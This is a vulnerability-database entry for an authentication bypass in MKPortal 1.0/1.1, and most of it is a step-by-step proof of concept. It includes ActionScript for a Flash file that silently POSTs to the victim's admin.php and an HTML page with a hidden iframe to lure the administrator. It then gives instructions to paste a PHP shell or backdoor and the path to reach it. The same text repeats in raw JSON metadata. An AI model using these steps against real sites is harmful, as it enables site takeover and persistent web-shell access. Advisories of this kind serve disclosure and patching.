Search...

MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability

2014-07-01T00:00:00

ID SSV:83931
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/25515/info

MKPortal is prone to an authentication-bypass vulnerability because it fails to restrict access to certain administrative functions.

Attackers can exploit this issue to gain unauthorized access to the application.

Versions prior to MKPortal 1.1.1 are vulnerable. 

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = &#34;Save+Permissions&#34;;
getURL(&#34;http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main&#34;, 
&#34;_self&#34;, &#34;POST&#34;);

Translate &#34;Save+Permissions&#34; in MKPortal language.
Example: &#34;Salva+questi+permessi&#34; for italian sites.

Then upload the swf file to a webserver and create an html page like 
this:

&#60;html&#62;
&#60;head&#62;
&#60;title&#62;Put a title here&#60;/title&#62;
&#60;/head&#62;
&#60;body&#62;
&#60;p&#62;Put some text here&#60;p&#62;
&#60;iframe src=&#34;http://yoursite.com/exploit.swf&#34; frameborder=&#34;0&#34; height=&#34;0&#34; 
width=&#34;0&#34;&#62;&#60;/iframe&#62;
&#60;/body&#62;
&#60;/html&#62;

Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate 
MKPortal.

So you can go here: 
http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php
and paste a php shell or a backdoor.
You can find your shell here: 
http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.

Translate &#34;page&#34; in MKPortal language.
Example: &#34;pagina&#34; for italian sites.

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-83931", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83931", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/25515/info\r\n\r\nMKPortal is prone to an authentication-bypass vulnerability because it fails to restrict access to certain administrative functions.\r\n\r\nAttackers can exploit this issue to gain unauthorized access to the application.\r\n\r\nVersions prior to MKPortal 1.1.1 are vulnerable. \r\n\r\nStart Macromedia Flash and create an swf file with this code:\r\n\r\nvar idg:Number = 9;\r\nvar p13:Number = 1;\r\nvar Salva:String = "Save+Permissions";\r\ngetURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", \r\n"_self", "POST");\r\n\r\nTranslate "Save+Permissions" in MKPortal language.\r\nExample: "Salva+questi+permessi" for italian sites.\r\n\r\nThen upload the swf file to a webserver and create an html page like \r\nthis:\r\n\r\n<html>\r\n<head>\r\n<title>Put a title here</title>\r\n</head>\r\n<body>\r\n<p>Put some text here<p>\r\n<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" \r\nwidth="0"></iframe>\r\n</body>\r\n</html>\r\n\r\nNow send the html page to MKPortal administrator.\r\nWhen admin opens the page all guests will be able to administrate \r\nMKPortal.\r\n\r\nSo you can go here: \r\nhttp://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php\r\nand paste a php shell or a backdoor.\r\nYou can find your shell here: \r\nhttp://victim.com/mkportal/cache/ppage_*.php\r\nwhere * is the ID of the page.\r\n\r\nTranslate "page" in MKPortal language.\r\nExample: "pagina" for italian sites.\r\n\n ", "id": "SSV:83931", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:53:10", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T16:53:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:53:10", "rev": 2}, "vulnersScore": -0.1}, "references": []}